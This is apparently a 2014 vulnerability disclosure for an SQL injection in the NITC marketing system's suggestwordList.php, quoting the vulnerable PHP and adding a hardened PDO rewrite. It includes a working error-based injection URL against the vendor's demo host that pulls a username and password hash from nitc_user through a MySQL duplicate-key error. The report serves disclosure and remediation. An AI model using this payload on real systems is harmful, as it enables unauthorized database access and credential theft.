Vulnerability summary
Followers: 24
Title: NITC marketing system SQL injection vulnerability
Submitted: 2014-07-02 17:05
Fixed: 2014-09-30 17:06
Published: 2014-09-30 17:06
Type: SQL injection
Severity: High
Self-assessed rank: 10
Status: vendor could not be contacted, or vendor actively ignored the report
Tags: none
Vulnerability details. Disclosure status:
2014-07-02: actively contacting the vendor and waiting for the vendor to claim the report; details withheld from the public. 2014-09-30: the vendor has actively ignored the vulnerability; details disclosed to the public.
Brief description: reproduced on the vendor's official demo site.
Detailed description: the injection is in suggestwordList.php. The script builds two queries by string concatenation; the second one appends $_GET['language'] without quotes, so no escaping (magic_quotes_gpc included) protects it.
```php
<?php
define( "IN_LOCK", true );
require( "./includes/init.php" );

$searchWord  = trim( $_GET['searchWord'] );
$searchWord1 = str_replace( "\\", "", $searchWord );   // used only for display below

if ( $searchWord ) {
    // $searchWord is concatenated into both queries as-is
    $sql = "select model as keyword from " . $site->table( "product" )
         . ( " where model like '" . $searchWord . "%' order by model limit 30" );
    $re1 = $db->getAll( $sql );

    $sql = "select product_desc.name as keyword from " . $site->table( "product" ) . " as product left join "
         . $site->table( "product_desc" )
         . ( " as product_desc on product.product_id=product_desc.product_id where product.state=0 and (product_desc.name like '"
         . $searchWord . "%') and product_desc.language_id=" )
         . $_GET['language'];   // no filtering at all; numeric context, so magic_quotes_gpc is irrelevant
    $re2 = $db->getAll( $sql );

    $re = array_merge( $re1, $re2 );
    if ( empty( $re ) ) {
        echo "<ul>";
        foreach ( $re as $val ) {
            echo "\r\n<li>\r\n\t<span class=\"suggword\"><span class=\"keyin\">";
            echo $searchWord1;
            echo "</span>";
            echo substr( $val['keyword'], strlen( $searchWord1 ) );
            echo "</span>\r\n</li>\r\n\r\n\r\n";
        }
        echo "</ul>";
    }
}
?>
```
Test against the vendor's demo site: http://demo.cnnitc.com/suggestwordList.php?searchWord=a&language=1%20AND%20(SELECT 1 FROM(SELECT COUNT(*),CONCAT(floor(rand(0)*2),(select concat(user_name,0x23,password) from nitc_user limit 0,1))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a)
The payload extends the numeric language_id comparison with AND and a subquery using the classic MySQL floor(rand(0)*2) + GROUP BY duplicate-key trick: MySQL aborts with a "Duplicate entry" error whose key text contains user_name#password of the first row of nitc_user, so the credential is read straight out of the error message.
Proof of vulnerability: see the request above.
Suggested fix: $language = intval($_GET['language']);
Note that this only covers the language parameter. $searchWord is concatenated into the LIKE clause of both queries as well and should be passed as a bound parameter rather than interpolated; the fix should also stop database error text from reaching the response, since the error-based payload above depends on it.
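As an added example (not the vendor's code, and not part of the original report), the same endpoint rewritten with PDO prepared statements so that both $_GET['language'] and $_GET['searchWord'] are bound instead of concatenated. It assumes a PDO handle to the NITC database and the table names nitc_product and nitc_product_desc; the original resolves table names through $site->table(), and the connection details are placeholders.

```php
<?php
// Added example: hardened suggestwordList.php. Assumed (not from the original
// source): a PDO connection, and tables nitc_product / nitc_product_desc.

function suggestKeywords(PDO $pdo, string $searchWord, $language): array
{
    $searchWord = trim($searchWord);
    if ($searchWord === '') {
        return [];
    }

    // Numeric parameter: cast before it reaches the query. The published
    // payload "1 AND (SELECT ...)" collapses to the integer 1.
    $languageId = (int) $language;

    // LIKE metacharacters are data here, not operators: escape % _ \ so a
    // caller cannot turn the prefix search into "%" and dump the catalogue.
    $prefix = addcslashes($searchWord, '%_\\') . '%';

    $stmt = $pdo->prepare(
        'SELECT model AS keyword FROM nitc_product
          WHERE model LIKE :prefix ORDER BY model LIMIT 30'
    );
    $stmt->execute([':prefix' => $prefix]);
    $re1 = $stmt->fetchAll(PDO::FETCH_ASSOC);

    $stmt = $pdo->prepare(
        'SELECT d.name AS keyword
           FROM nitc_product AS p
           LEFT JOIN nitc_product_desc AS d ON p.product_id = d.product_id
          WHERE p.state = 0 AND d.name LIKE :prefix AND d.language_id = :lang'
    );
    $stmt->bindValue(':prefix', $prefix, PDO::PARAM_STR);
    $stmt->bindValue(':lang', $languageId, PDO::PARAM_INT);
    $stmt->execute();
    $re2 = $stmt->fetchAll(PDO::FETCH_ASSOC);

    return array_merge($re1, $re2);
}

function renderSuggestions(array $rows, string $searchWord): string
{
    if ($rows === []) {
        return '';
    }
    $typed = trim($searchWord);
    $out = "<ul>";
    foreach ($rows as $row) {
        $rest = substr($row['keyword'], strlen($typed));
        $out .= "\r\n<li>\r\n\t<span class=\"suggword\"><span class=\"keyin\">"
              . htmlspecialchars($typed, ENT_QUOTES, 'UTF-8')
              . "</span>"
              . htmlspecialchars($rest, ENT_QUOTES, 'UTF-8')
              . "</span>\r\n</li>\r\n";
    }
    return $out . "</ul>";
}

// Placeholder DSN and credentials (assumed). Native prepares keep the
// parameter out of the SQL text entirely; exceptions must be logged, not
// echoed, or the error-based payload gets its oracle back.
$pdo = new PDO(
    'mysql:host=localhost;dbname=nitc;charset=utf8mb4',
    'nitc_user',
    'change-me',
    [
        PDO::ATTR_EMULATE_PREPARES => false,
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    ]
);

try {
    $rows = suggestKeywords($pdo, $_GET['searchWord'] ?? '', $_GET['language'] ?? 0);
    echo renderSuggestions($rows, $_GET['searchWord'] ?? '');
} catch (PDOException $e) {
    error_log('suggestwordList: ' . $e->getMessage());
    http_response_code(500);
}
```

The cast on language is what the report's one-line fix does; binding the LIKE prefix as a parameter closes the second string-concatenation point in the same two queries, and routing PDOException to error_log instead of the response removes the error channel the duplicate-entry payload relies on.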
Vendor response: none (the report was marked as ignored by the vendor).